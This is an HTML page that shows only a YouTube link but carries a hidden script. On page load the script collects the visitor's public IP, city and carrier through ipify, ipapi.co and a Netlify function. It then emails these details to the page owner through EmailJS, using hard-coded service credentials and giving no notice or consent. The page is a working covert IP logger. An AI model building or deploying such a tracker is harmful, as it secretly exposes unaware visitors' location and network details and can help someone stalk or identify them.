<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>JOTAAU</title>
    <style>
        body {
            background-color: #303030;
            width: 100vw;
            height: 100vh;
            overflow-x: hidden;
            box-sizing: border-box;
        }
        body {
        background-color: rgb(255, 255, 255);
        color: white;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
        }

        /* Responsive iframe container */
        .video-container {
        position: relative;
        width: 80%;
        padding-bottom: 45%; /* Maintain aspect ratio 16:9 */
        height: 0;
        }

        /* Responsive iframe styling */
        .video-container iframe {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        border: none;
        }
        p,a{
            color: rgb(60, 0, 255);
        }
    </style>
</head>

<body>
                <p><a href="https://www.youtube.com/watch?v=mt9xg0mmt28">https://www.youtube.com/watch?v=mt9xg0mmt28</a>
                </p>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>
    <script>
        $.getJSON("https://api.ipify.org?format=json", function (clientData) {
            var clientIp = clientData.ip;

            $.getJSON("https://ipapi.co/" + clientIp + "/json/", function (locationData) {
                var cityName = locationData.city;
                console.log(cityName);

                var request = new XMLHttpRequest();
                request.open('GET', '/.netlify/functions/fetchIpData');
                request.setRequestHeader('Accept', 'application/json');

                request.onreadystatechange = function () {
                    if (this.readyState === 4 && this.status === 200) {
                        var data = JSON.parse(this.responseText);
                        var ip = data.ip || clientIp;
                        var city = data.city || cityName;
                        var carrierName = data.carrierName || "Song";
                        var time = data.time || "000";
                        var counter = data.count || "unknown";

                        $.ajax({
                            url: 'https://api.emailjs.com/api/v1.0/email/send',
                            type: 'POST',
                            data: JSON.stringify({
                                service_id: 'service_lne6ewa',
                                template_id: 'template_3r6bobi',
                                user_id: '1NnuuCpetYJt2e-1h',
                                template_params: {
                                    ip: ip,
                                    city: city,
                                    time: time,
                                    carrierName: carrierName,
                                    counter: counter
                                }
                            }),
                            contentType: 'application/json',
                            success: function (data) {
                                console.log("Email sent successfully");
                            },
                            error: function (error) {
                                console.log("Error sending email:", error);
                            }
                        });
                    }
                };

                request.send();
            });
        });

        function writeTodaysDate() {
            const today = new Date();
            const formattedDate = "Date: " + today.getDate() + '/' + (today.getMonth() + 1) + '/' + today.getFullYear();
            document.getElementById("limitedAccessDate").textContent = formattedDate;
        }
        // Call the function to execute
        writeTodaysDate();
    </script>
</body>

</html>
